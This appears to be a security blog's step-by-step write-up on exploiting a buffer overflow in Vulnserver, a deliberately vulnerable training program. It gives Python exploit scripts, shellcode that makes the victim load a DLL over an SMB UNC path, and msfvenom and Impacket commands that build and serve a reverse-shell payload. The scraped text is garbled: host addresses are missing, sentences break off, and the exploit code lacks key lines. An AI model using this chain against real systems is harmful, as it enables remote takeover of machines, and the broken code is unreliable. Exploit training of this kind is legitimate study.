| 10 min read
This is an alternate take of the article of exploiting the
KSTET command of Vulnserver
, a VbD
(Vulnerable-by-Design) application in which you can practice Windows
exploit development.
exploitation is really interesting because after controlling
the instruction pointer EIP
, we are left with little space to work on.
With that kind of restrictions, we must be very creative in order to
achieve a working exploit that triggers something complex like a reverse
shell. For example, we also had space restrictions in the exploitation
of the GTER
command, and we used an Egghunter
and reused part of the WinSock stack
to create a custom reverse shellcode.
In the KSTET
command article, we used a technique called socket
reusing. In this post we will squeeze our space
restriction a little more and use a different exploitation technique.
I will shamelessly leave part of the article for the KSTET
exploitation and only divert it when needed.
take 2!
Fingerprinting KSTET
Enumerating and fingerprinting is the most important step when verifying the security of any target.
Let’s check how the KSTET
command behaves:
$ telnet 9999
Connected to
Escape character is '^]'.
Welcome to Vulnerable Server! Enter HELP for help.
KSTET hello
Well, easy enough. Now we are going to do the same but we will check it under our debugger. I will use Immunity Debugger.
The first step is to identify where the KSTET
command is processed.
We can do that by right-clicking, then Search for → All referenced text strings
, right-click again, then Search for text
and type KSTET
Make sure that Entire scope
is selected. Now, select the match on
where KSTET
string is presented and set a breakpoint:
With that in place, we can start our connection to Vulnserver
and see what happens under the hood:
As you can see, several things are happening:
Our breakpoint was reached when we typed
KSTET hello
. -
Several external functions are called, including
. -
There is one function that stands out:
, which will copy anything that is on one buffer to another, without checking buffer boundaries.
Let’s see what happens when we issue something larger than a hello
Uggh! With a very short string, Vulnserver crashed, and we overwrote
, which means that we can control the execution flow of the
With that, we can start creating our proof-of-concept exploit:
import socket
HOST = ''
PORT = 9999
b'KSTET ' +
b'A' * 200
with socket.create_connection((HOST, PORT)) as fd:
print('Sending payload...')
And check it:
That’s good news. However, the injected string was really short, and maybe we’d have a narrow buffer space to work on.
Checking available buffer space
If we check the state of the application after the crash, we will see this:
In the dump window (bottom left), we see our injected buffer. In the
PoC, we sent 200 A
chars, but as you can see here, the total amount of
injected bytes, including the word KSTET
itself, is only 0x63 or 99
In the GTER
command exploitation, we had 140+ bytes to work on, and we
used two techniques: WinSocket stack
reusing and an
The first one is not viable because although we reduced the shellcode length to the half, the resultant shellcode was 128 bytes.
We could use an egghunter
here, but that wouldn’t be much fun. Why
make it easy if we can do it the hard way?
OK, let’s start by checking the offset of the crash by creating a cyclic
pattern of 100 characters using pattern_create.rb
tool from
$ msf-pattern_create -l 100
And update our exploit:
import socket
HOST = ''
PORT = 9999
b'KSTET ' +
b'<paste pattern here>'
with socket.create_connection((HOST, PORT)) as fd:
print('Sending payload...')
And check it:
As you can see, EIP
was overwritten with 63413363
. We can check the
offset of that bytes on our cyclic pattern to get the offset on where
gets overwritten:
$ msf-pattern_offset -q 63413363
[*] Exact match at offset 70
Now, check that offset by updating our exploit:
import socket
HOST = ''
PORT = 9999
b'KSTET ' +
b'A' * 70 +
b'B' * 4 +
b'C' * 26
with socket.create_connection((HOST, PORT)) as fd:
print('Sending payload...')
And run it:
Wonderful! We know exactly how to overwrite EIP
to get control over
the execution flow.
As with the TRUN and GTER
commands, we have a direct EIP
overwrite here, and the ESP
points directly to our controlled buffer. That means that we can look
for a JMP ESP
instruction and overwrite EIP
with its address to take
control of the execution flow. We can do that using mona.py
!mona jmp -r esp -cp nonull -o
This would tell mona
to look for instructions that can be used to jump
to ESP
(jmp -r esp
), excluding pointers with null bytes (-cp nonull
) and omitting OS DLLs (-o
). The result is the following:
We can choose any of those 9 pointers. I’ll choose the one at
Now, we can update the exploit with that address:
import socket
import struct
HOST = ''
PORT = 9999
b'KSTET ' +
b'A' * 70 +
# 625011BB FFE4 JMP ESP
struct.pack('<L', 0x625011BB) +
b'C' * 26
with socket.create_connection((HOST, PORT)) as fd:
print('Sending payload...')
And check it:
Great! However, as you can see, we landed on a 20 bytes buffer where we
put the C
chars, but we have 66 bytes above on the buffer of the A
With a short jump backward, we can easily jump to that place:
The resultant bytes were EB B5
. We can update our exploit with that:
import socket
import struct
HOST = ''
PORT = 9999
b'KSTET ' +
b'A' * 70 +
# 625011BB FFE4 JMP ESP
struct.pack('<L', 0x625011BB) +
# JMP SHORT 0xb5
b'\xeb\xb5' +
b'C' * (26 - 2)
with socket.create_connection((HOST, PORT)) as fd:
print('Sending payload...')
And check it:
But again, we were brutally reminded that we have a narrow buffer space to work on.
To work around that constraint, we will use this time a sideloading technique for injecting the needed payload from an adjacent computer.
Dynamic linking
Commonly, when creating an exploit, you inject the required payload and
modify the instruction pointer EIP
to point to your code. Then, the
victim application will execute the code you injected, which can be a
simple MessageBox
or anything complex like a TCP
That payload, or shellcode, can only use calls to the OS API of modules that the victim application has already loaded in memory.
The OS API is distributed on reusable files that can be linked to any
application. In Windows, they are known as Dynamic-Link Library or
files. Commonly, an application will load executable dependencies
at run-time using the OS dynamic linker.
We can see the DLL
files loaded using several ways. On Vulnserver, we
will use our debugger again:
That means that Vulnserver (and therefore, our shellcode) can execute any function included on any of those modules.
However, there is a way for an application to include new libraries when
it’s already running: Dynamic Linking. On Windows, it can be done
with any of the LibraryLoad functions family. Those functions are
located on KERNEL32.DLL
, which is the module that exposes most of the
Win32 base API; therefore, virtually any Windows application has it
loaded at run-time.
As the injected shellcode is also part of the application, we can
dynamically link any available DLL
With that ultra-simplified introduction to dynamic linking, it’s time to write some Assembler!
Dynamic-included payload
The first thing to do is to locate the address of LoadLibraryA
on our
system. We can do that using the
arwin tool:
C:\Users\Fluid Attacks\Downloads\osce\tools>arwin.exe kernel32 LoadLibraryA
arwin - win32 address resolution program - by steve hanna - v.01
LoadLibraryA is located at 0x76460b30 in kernel32
NOTE: I’m using Windows 10 Pro 20H2
at the moment of this writing.
is enabled by default, the LoadLibraryA
address will change
on every reboot.
We also need to know the LoadLibraryA
Taken from https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya.
HMODULE LoadLibraryA(
LPCSTR lpLibFileName
Easy! The lpLibFileName
is a string with the location of the DLL
file to be included. To our advantage, the location can be a Universal
Naming Convention (UNC
) path in the form \\server\share\file.dll
In Windows, that path would be resolved using the SMB
protocol. That
means that we must expose that file using an SMB
server, but we will
get to that later. For now, we can predict that the UNC
path of our
payload will be at \\attacker_ip\share\shell.dll
; in my case, it would
be \\\X\pwn.dll
To call LoadLibraryA
on an x86
architecture, we must push into the
stack the lpLibFileName
value, which is a pointer to the
string. As x86
is a 32 bits architecture,
we must push exactly 4 bytes each time into the stack, and as we are
pushing data into the stack, it must be in reverse order. So, we need to
convert \\\X\pwn.dll
to hex, split it in chunks of 4
bytes, pad as needed and reverse. This can be done with:
$ for i in $(echo -ne '\\\\\\X\\pwn.dll' | xxd -ps | tr -d '\n' | fold -w 8); do python3 -c "import struct;print(struct.pack('<L', 0x$i).hex())"; done | tac | sed 's/^/push 0x/g'
push 0x6c6c642e
push 0x6e77705c
push 0x585c3831
push 0x2e302e38
push 0x36312e32
push 0x39315c5c
With the required information, we can now write the call to
sub esp,0x64 ; Move ESP pointer above our initial buffer to avoid
; overwriting our shellcode
xor ebx,ebx ; Zero out EBX that will be the NULL byte terminating
; the UNC path
push ebx ; PUSH NULL byte
push 0x6c6c642e ; \\\X\pwn.dll reversed
push 0x6e77705c
push 0x585c3831
push 0x2e302e38
push 0x36312e32
push 0x39315c5c
push esp ; Push pointer of the UNC path
mov ebx,0x76460b30 ; Move into EBX the address of 'LoadLibraryA'
call ebx ; call 'LoadLibraryA("\\\X\pwn.dll")'
We can compile that using nasm
nasm -f elf32 -o shellcode.o shellcode.asm
And obtain the shellcode using this:
$ for i in $(objdump -d shellcode.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo
Let’s update our exploit with that:
import socket
import struct
HOST = ''
PORT = 9999
b'KSTET ' +
b'\x90' * 2 +
b'A' * (70 - len(LOAD_LIBRARY) - 2) +
# 625011BB FFE4 JMP ESP
struct.pack('<L', 0x625011BB) +
# JMP SHORT 0xb5
b'\xeb\xb5' +
b'C' * (26 - 2)
with socket.create_connection((HOST, PORT)) as fd:
print('Sending payload...')
And check it:
Great! The LoadLibraryA
function is now ready.
Show time
Now that we have everything set, we must now create a shellcode on a
file and share it on an SMB
Luckily for us, msfvenom
can create shellcodes in DLL
format. Let’s
do that:
$ msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=none -f dll -o pwn.dll
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 5120 bytes
Saved as: pwn.dll
We also must serve that pwn.dll
file on an SMB
share called X
. We
can use Impacket’s smbserver.py
to do that:
$ sudo impacket-smbserver -smb2support X .
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
This will create a new anonymous SMB
server, will share the current
directory .
, using a share called X
. The -smb2support
parameter is
needed because Windows 10 will refuse to connect to SMB
servers using
the SMBv1
We are now ready. We can check our exploit:
Yes! We got a shell! You can see how the victim is self-hacking by retrieving the payload from our attacking machine!
You can also see that pwn.dll
is now part of the vulnserver.exe
executable modules:
Crazy, huh? You can download the final exploit here.
This was a very fun way of exploiting Vulnserver. Remember that this technique only works if the attacking machine is adjacent to the victim machine and there are no network restrictions between them.
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